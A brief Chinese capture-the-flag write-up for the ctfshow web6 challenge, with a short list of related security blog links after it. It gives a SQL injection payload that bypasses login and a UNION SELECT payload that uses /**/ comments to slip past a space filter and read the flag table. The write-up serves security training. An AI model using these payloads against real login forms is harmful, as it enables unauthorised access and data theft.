ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
青岑CTF1 小时前
攻防世界-Php_rce-胎教版wp
开发语言·安全·web安全·网络安全·php
小虎牙^O^4 小时前
2025春秋杯网络安全联赛冬季赛WP
安全·web安全
乾元4 小时前
实战案例:解析某次真实的“AI vs. AI”攻防演练
运维·人工智能·安全·web安全·机器学习·架构
lingggggaaaa8 小时前
安全工具篇&魔改二开&CheckSum8算法&Beacon密钥&Stager流量&生成机制
学习·算法·安全·web安全·网络安全·免杀对抗
ZeroNews内网穿透9 小时前
本地搭建 Clawdbot + ZeroNews 访问
网络·安全·web安全·clawdbot
云小逸10 小时前
【Nmap 设备类型识别技术】从nmap_main函数穿透核心执行链路
网络协议·安全·web安全
米羊1211 天前
威胁识别(上)
网络·安全·web安全
白帽子黑客罗哥1 天前
护网行动中遇到突发安全事件的标准应急响应流程
网络·安全·web安全·计算机·护网行动
EverydayJoy^v^1 天前
RH134简单知识点——第11章—— 管理网络安全
linux·网络·web安全
ZeroNews内网穿透1 天前
关于飞牛fnOS重要安全更新的提醒
运维·服务器·web安全·ssh